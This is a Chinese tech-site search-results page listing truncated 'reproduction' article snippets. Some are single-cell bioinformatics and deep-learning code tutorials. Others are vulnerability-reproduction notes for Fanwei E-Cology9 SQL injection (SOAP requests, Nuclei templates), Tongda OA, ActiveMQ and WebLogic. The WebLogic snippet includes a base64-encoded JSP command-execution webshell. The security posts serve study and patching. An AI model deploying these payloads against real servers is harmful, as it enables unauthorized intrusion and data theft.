首页
学习
活动
专区
圈层
工具
发布
    • 综合排序
    • 最热优先
    • 最新优先
    时间不限
  • 来自专栏文献分享及代码学习

    单细胞数据复现-肺癌文章代码复现9

    单细胞数据复现-肺癌文章代码复现1https://cloud.tencent.com/developer/article/1992648单细胞数据复现-肺癌文章代码复现2https://cloud.tencent.com /developer/article/1995619单细胞数据复现-肺癌文章代码复现3https://cloud.tencent.com/developer/article/1996043单细胞数据复现 -肺癌文章代码复现4https://cloud.tencent.com/developer/article/2006654单细胞数据复现-肺癌文章代码复现5https://cloud.tencent.com /developer/article/2008487单细胞数据复现-肺癌文章代码复现6https://cloud.tencent.com/developer/article/2008704单细胞数据复现 -肺癌文章代码复现7https://cloud.tencent.com/developer/article/2019634单细胞数据复现-肺癌文章代码复现8https://cloud.tencent.com

    1.1K40编辑于 2022-07-11
  • 来自专栏Cyber Security

    【漏洞复现】泛微E-Cology9 WorkPlanService 前台SQL注入

    0x00 漏洞描述 泛微E-Cology9 是泛微网络科技股份有限公司开发的一款高效、灵活、全面的企业信息化办公系统。 泛微E-Cology9 中的 /services/WorkPlanService 接口存在SQL注入漏洞,攻击者可构造SOAP 请求进行SQL注入,窃取或修改数据库敏感信息,进一步利用可能获取目标系统权限 影响范围 泛微补丁包<10.65.0 0x01 测绘工具 fofa: app=“泛微-OA(e-cology)” 0x02 漏洞复现 POST /services/WorkPlanService HTTP </web:deleteWorkPlan> </soapenv:Body> </soapenv:Envelope> 0x03 Nuclei检测脚本 id: 泛微E-Cology9 WorkPlanService 前台SQL注入 info: name: 泛微E-Cology9 WorkPlanService 前台SQL注入 author: admin severity

    2.5K10编辑于 2024-08-11
  • 来自专栏DrugScience

    文章复现-No.1-Rosetta-KIC-Part-9-rosetta-GeneralizedKIC 示例-2

    提示:基本内容均在rosettabinlinux2021.07.61567bundle/main/demos/tutorials/GeneralizedKIC 中 文章复现-No.1-Rosetta-KIC-Part -9-rosetta-GeneralizedKIC 示例-2 前言 目标 使用GeneralizedKIC时的注意事项 练习 1: 建立一个多肽loop,并且闭合此loop,使用RosettaScripts

    47440发布于 2021-04-22
  • 来自专栏Cyber Security

    【漏洞复现】泛微e-cology9 WorkflowServiceXml SQL注入漏洞

    漏洞名称 泛微e-cology9 WorkflowServiceXml SQL注入漏洞 公开时间 2024-07-10 威胁类型 命令执行 漏洞描述 在默认配置下,未授权攻击者可利用该漏洞执行任意SQL 影响范围 泛微e-cology9 < 10.64.1 漏洞复现 POST /services/WorkflowServiceXml HTTP/1.1 Host: x.x.x.x Content-Type </web:getHendledWorkflowRequestList> </soapenv:Body> </soapenv:Envelope> nuclei脚本 id: 泛微e-cology9 words: - "getHendledWorkflowRequestListResponse" 安全修复 目前官方已发布安全补丁,建议受影响用户升级至最新版本: 泛微e-cology 9 invite_code=2g93y2r9ge1w0

    2.1K10编辑于 2024-07-18
  • 来自专栏生信技能树

    9步骤完成单细胞数据挖掘文章全部图表复现

    两个月前我们更新了优秀的马拉松学员笔记:单细胞+芯片+转录组测序的数据挖掘文章一比一复现,内容非常详实,理论上该流程可以复用到然后一个癌症或者其它疾病,大纲也很清晰(单细胞数据分析本身往往是数据挖掘课题的一个环节而已 ),接下来继续更新另外一个癌症的复现,大纲不一样哦,大家一定要抽空刷完这波: 文章图表复现: Integration of scRNA-Seq and Bulk RNA-Seq to Analyse 手动进行细胞注释 # 免疫细胞 5,6,8,9,15,20 DotPlot(sce,features = c('PTPRC','CD45')) # T细胞 0,[8],9,13 DotPlot = hclust(as.dist(selectTOM), method = "average") selectColors = module_color[select] sizeGrWindow(9,9 =0,1] 9.

    3.7K12编辑于 2023-09-04
  • 来自专栏YX’blog

    复现

    本次教程来自YanXia,转载请注明作者信息,博客地址http://www.535yx.cn,感谢

    45410编辑于 2023-04-07
  • 来自专栏单细胞天地

    9步骤完成单细胞数据挖掘文章全部图表复现

    文章图表复现: Integration of scRNA-Seq and Bulk RNA-Seq to Analyse the Heterogeneity of Ovarian Cancer Immune 该细胞在这两个亚组的比例有显著差异 批量单因素cox回归找出hub gene中与生存相关的gene lasso回归进一步筛选gene 多因素cox回归,计算riskScore,riskScore与生存信息的相关性 具体复现流程 手动进行细胞注释 # 免疫细胞 5,6,8,9,15,20 DotPlot(sce,features = c('PTPRC','CD45')) # T细胞 0,[8],9,13 DotPlot = hclust(as.dist(selectTOM), method = "average") selectColors = module_color[select] sizeGrWindow(9,9 =0,1] 9.

    1.5K31编辑于 2023-08-31
  • 来自专栏往期博文

    深度学习基础:9.复现经典网络:LeNet5与AlexNet

    1998年, LeNet5 被LeCun等人在论文《Gradient-Based Learning Applied to Document Recognition》中正式提出,它被认为是现代卷积神经网络的奠基者。

    57110编辑于 2022-09-08
  • 来自专栏登神长阶

    【论文复现】YOLOv5复现

    self.feat_dims[2], expand_ratio = 0.5, nblocks = round(9* self.feat_dims[3], expand_ratio = 0.5, nblocks = round(9*

    1.2K10编辑于 2024-11-30
  • 来自专栏一名白帽的成长史

    【漏洞复现】Apache ActiveMQ相关漏洞复现

    Hello,各位小伙伴大家好~ 这里是一名白帽的成长史~ 最近在攻防演习中用到ActiveMQ的漏洞进行getshell 今天就来复现一下它的一系列漏洞吧~ Part.1 环境准备 环境说明 Apache vulhub.org/ 通过vulhub进行漏洞环境搭建: 查看容器端口映射关系,搭建成功: Web服务端口为8161,尝试访问主页: http://192.168.3.129:8161 Part.2 漏洞复现

    6.4K10编辑于 2022-03-03
  • 来自专栏网络攻防实战知识交流

    WebLogic wls9-async 反序列化漏洞(CNVD-C-2019-48814)复现

    漏洞说明 近日,国家信息安全漏洞共享平台(CNVD)收录了Oracle WebLogic wls9-async反序列化远程命令执行漏洞(CNVD-C-2019-48814)。 部分版本WebLogic中默认包含的wls9_async_response包,为WebLogic Server提供异步通讯服务。 PCUKICAgICAgICBqYXZhLmlvLklucHV0U3RyZWFtIGluID0gUnVudGltZS5nZXRSdW50aW1lKCkuZXhlYyhyZXF1ZXN0LmdldFBhcmFtZXRlcigiY21kIikpLmdldElucHV0U3RyZWFtKCk7CiAgICAgICAgaW50IGEgPSAtMTsgICAgICAgICAgCiAgICAgICAgYnl0ZVtdIGIgPSBuZXcgYnl0ZVsxMDI0XTsgICAgICAgICAgCiAgICAgICAgb3V0LnByaW50KCI8cHJlPiIpOyAgICAgICAgICAKICAgICAgICB3aGlsZSgoYT1pbi5yZWFkKGIpKSE9LTEpewogICAgICAgICAgICBvdXQucHJpbnRsbihuZXcgU3RyaW5nKGIpKTsgICAgICAgICAgCiAgICAgICAgfQogICAgICAgIG91dC5wcmludCgiPC9wcmU +Iik7CiU+Cg==|base64 -d >servers/AdminServer/tmp/_WL_internal/bea_wls9_async_response/8tpkys/war/shell.jsp % url if __name__=='__main__': poc() 攻击成功之后,可以获得一个shell GET 密码是cmd 修复方案 删除该wls9_async_response.war

    1.6K20发布于 2019-07-24
  • 来自专栏安全学习

    漏洞复现

    漏洞编号CVE-2017-18349漏洞搭建这里使用vulhub的fastjson/1.2.24-rce进行复现。 访问http://192.168.146.167:37150/漏洞复现使用工具进行检测发现dnslog有数据,说明存在漏洞。

    63710编辑于 2022-12-29
  • 来自专栏人工智能基础

    googlenet 复现

    7*7*3*64*112*112=118,013,952 3a inception模块: 参数(不包含偏置项): (192*64(第一个1*1) + 192*96(3*3之前的1*1) + 9*

    66600发布于 2020-11-17
  • 来自专栏谢公子学安全

    漏洞复现 | 通达OA命令执行漏洞复现

    通达OA命令执行漏洞复现 目录 漏洞描述 漏洞等级 漏洞影响版本 修复建议 漏洞复现 ▶漏洞描述 通达OA是北京通达信科科技有限公司出品的 "Office Anywhere 通达网络智能办公系统"。 com/oa/security/2020_A1.7.25.exe 2013版 http://cdndown.tongda2000.com/oa/security/2020_A1.6.20.exe ▶漏洞复现 默认账号:admin 密码为空 ◣脚本复现 首先用脚本复现,直接命令执行即可。 python3 tongda_rce.py 目标URL ◣手工复现 手工抓包验证,该漏洞存在于以下两个链接中,并且以下链接无需认证即可访问。

    7.9K00编辑于 2022-01-19
  • 来自专栏文献分享及代码学习

    单细胞数据复现-肺癌文章代码复现5

    单细胞数据复现-肺癌文章代码复现1https://cloud.tencent.com/developer/article/1992648 单细胞数据复现-肺癌文章代码复现2https://cloud.tencent.com /developer/article/1995619 单细胞数据复现-肺癌文章代码复现3https://cloud.tencent.com/developer/article/1996043 单细胞数据复现 -肺癌文章代码复现4https://cloud.tencent.com/developer/article/2006654 教程3和4主要是分别对epi细胞亚群进行的分析,也是将亚群细分,然后去找里面比较重要的基因 E1BD6D", p029 = "#35274A", p030 = "#F2300F", p031 = "#7294D4", p032 = "#5B1A18", p033 = "#9C964A

    1.1K20编辑于 2022-05-22
  • 来自专栏文献分享及代码学习

    单细胞数据复现-肺癌文章代码复现7

    单细胞数据复现-肺癌文章代码复现1https://cloud.tencent.com/developer/article/1992648单细胞数据复现-肺癌文章代码复现2https://cloud.tencent.com /developer/article/1995619单细胞数据复现-肺癌文章代码复现3https://cloud.tencent.com/developer/article/1996043单细胞数据复现 -肺癌文章代码复现4https://cloud.tencent.com/developer/article/2006654单细胞数据复现-肺癌文章代码复现5https://cloud.tencent.com /developer/article/2008487单细胞数据复现-肺癌文章代码复现6https://cloud.tencent.com/developer/article/2008704​下面主要是对差异基因进行分析

    87120编辑于 2022-06-09
  • 来自专栏洛米唯熊

    Oracle WebLogic wls9-async 组件反序列化远程命令执行漏洞已复现

    部分版本 WebLogic 中默认包含的 wls9_async_response 包,为 WebLogic Server 提供异步通讯服务。 此漏洞存在于 weblogic 自带的 wls9_async_response.war 组件中,由于该 war 包在反序列化处理输入信息时存在缺陷,未经授权的攻击者可以发送精心构造的恶意 HTTP 请求 漏洞复现 使用burp进行抓包,把payload放进去 点击 发送 成功弹出计算器。 ?

    1.1K10发布于 2019-07-25
  • weblogic漏洞复现

    <object class="java.io.PrintWriter"> <string>servers/AdminServer/tmp/_WL_internal/bea_wls_internal/9j4dqk 可导致未授权的用户在远程服务器执行任意命令,T3协议简单来说就是快速传输协议漏洞环境https://github.com/vulhub/vulhub启动环境docker-compose up -d启动如下漏洞复现此漏洞复现需要下载 应为python3编码与python2不同,导致出现问题复制下图,握手成功表示脚本成功运行如下图,进入docker可查看成功创建目录最后我想试着能不能反弹shell能不能成功,但是不知到什么鬼原因无法复现 ,但是此漏洞前提是需要知道后台管理员密码CVE-2020-14882(未授权+RCE)简介此次复现是两个漏洞组合导致远程命令执行,分别是CVE-2020-14882和CVE-2020-14883。 javaSerializedData)时,这可能会导致 RCE 漏洞漏洞环境https://github.com/vulhub/vulhub启动环境docker-compose up -d启动如下漏洞复现

    1K10编辑于 2024-03-23
  • 来自专栏文献分享及代码学习

    单细胞数据复现-肺癌文章代码复现8

    单细胞数据复现-肺癌文章代码复现1https://cloud.tencent.com/developer/article/1992648 单细胞数据复现-肺癌文章代码复现2https://cloud.tencent.com /developer/article/1995619 单细胞数据复现-肺癌文章代码复现3https://cloud.tencent.com/developer/article/1996043 单细胞数据复现 -肺癌文章代码复现4https://cloud.tencent.com/developer/article/2006654 单细胞数据复现-肺癌文章代码复现5https://cloud.tencent.com /developer/article/2008487 单细胞数据复现-肺癌文章代码复现6https://cloud.tencent.com/developer/article/2008704 单细胞数据复现 E1BD6D", p029 = "#35274A", p030 = "#F2300F", p031 = "#7294D4", p032 = "#5B1A18", p033 = "#9C964A

    83920编辑于 2022-06-17
  • 来自专栏文献分享及代码学习

    单细胞数据复现-肺癌文章代码复现2

    saveRDS(imm, file = "seurat_objects/imm.RDS") saveRDS(str, file = "seurat_objects/str.RDS") fig1图片的复现 remove(seu_obj) ​ [Fig1B.png] ​ [Fig1C.png] ​ [Fig1D_umap.png] ​ [Fig1D_barplot.pdf] 总结 目前是将第一部分的内容进行了复现

    2.4K20编辑于 2022-05-07
领券